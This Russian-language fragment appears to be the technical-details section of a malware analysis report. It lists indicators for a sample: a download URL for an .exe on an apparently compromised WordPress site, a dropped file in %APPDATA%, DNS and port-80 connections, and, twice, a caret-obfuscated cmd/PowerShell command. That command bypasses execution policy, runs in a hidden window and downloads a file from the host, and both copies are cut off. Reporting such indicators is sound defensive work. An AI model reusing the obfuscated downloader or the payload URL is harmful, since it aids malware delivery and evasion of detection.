Техническая информация
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^rShel^l.E^x^e^ -EXE^Cu^TIO^n^POlIcY ^bYP^asS^ -^N^o^p^r^O^Fil^E -W^iNdoWS^T^Y^le ^HiDDEn ^(NE^W-^objeCt syS^Te^m.^N^Et.^WEbC^L^I^EnT).dOW^NlO^a^DFILE('http://nsholida...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /c "poWe^rShel^l.E^x^e^ -EXE^Cu^TIO^n^POlIcY ^bYP^asS^ -^N^o^p^r^O^Fil^E -W^iNdoWS^T^Y^le ^HiDDEn ^(NE^W-^objeCt syS^Te^m.^N^Et.^WEbC^L^I^EnT).dOW^NlO^a^DFILE('http://nsholida...' (со скрытым окном)